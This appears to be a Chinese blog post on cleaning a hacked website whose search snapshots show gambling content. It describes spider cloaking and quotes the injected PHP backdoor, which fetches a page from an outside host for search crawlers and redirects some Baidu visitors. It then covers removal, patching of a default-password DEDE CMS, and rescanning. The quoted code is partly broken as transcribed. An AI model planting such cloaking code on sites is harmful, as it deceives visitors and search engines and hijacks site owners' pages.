解决网站快照与网站实际内容不符

前天 QQ上收到一个朋友发来的消息，问我在吗，我一看是创业园时候的朋友，就聊了起来，他所在的公司的客户的网站被入侵了

但是他和我说 他的那个客户的网站不是这类的，和这个一点关系都没有，我打开了域名看到的实际内容是

是一个商业网站，这时候我的思路很清晰了，首先可以确定的是人和蜘蛛看到的内容不一样，这也是常用黑帽手法，这样可以获取大量的外链，为了进一步确认的我思路，我决定用蜘蛛模拟器试试结果如下图：

果然和我想的是一样的，这就证明了我的猜想，这种一般就是在网站根目录添加一个畸形文件，让这个畸形文件无法删除

并且优先级要高于网站本身的权限，或者是在网站的默认文件档里面加上一段代码，来调用他的文件，来判断来的人还是蜘蛛

如果是蜘蛛就给它显示博采的内容，如果是人就显示正常的页面，在了FTP帐号密码 进行一步检查，

发现用的是我的第二种手法， 在文件内加入了以下PHP代码

$file="http://www.aoxsys.net/seo/3.html";

$referer=$_SERVER["HTTP_REFERER"];

$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);

if(strstr($referer,"baidu")&&strstr($referer,"456"))

{

Header("Location: $url");

}

if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))

{

$content=file_get_contents($file);

echo $content;

exit;

}

>

< php

这个代码明白的一看就知道了吧，我就不解释了，在根目录还发现一个加密的文件，那个文件貌似是博采的网页内容，命名为index.asp.asp 接下来就是替换INDEX.PHP文件 然后删除相关后门，打上补丁，

但是当我拿到网站后台的帐号密码的时候我崩溃了，密码竟然 是默认的，帐号也是默认的，程序是DEDE 存在安全漏洞

修补漏洞 用DEDE的安全检测工具稍微检查了一下木马和WEBSHELL 没有多余发现，打上补丁收工，再用蜘蛛模拟器查看

网站内容和蜘蛛的爬行内容一致了 接下来就是@蜘蛛了 让蜘蛛过来爬 收录并更新快照 什么怎么@蜘蛛吗 这你都不会吗

那我也不会 嘿嘿!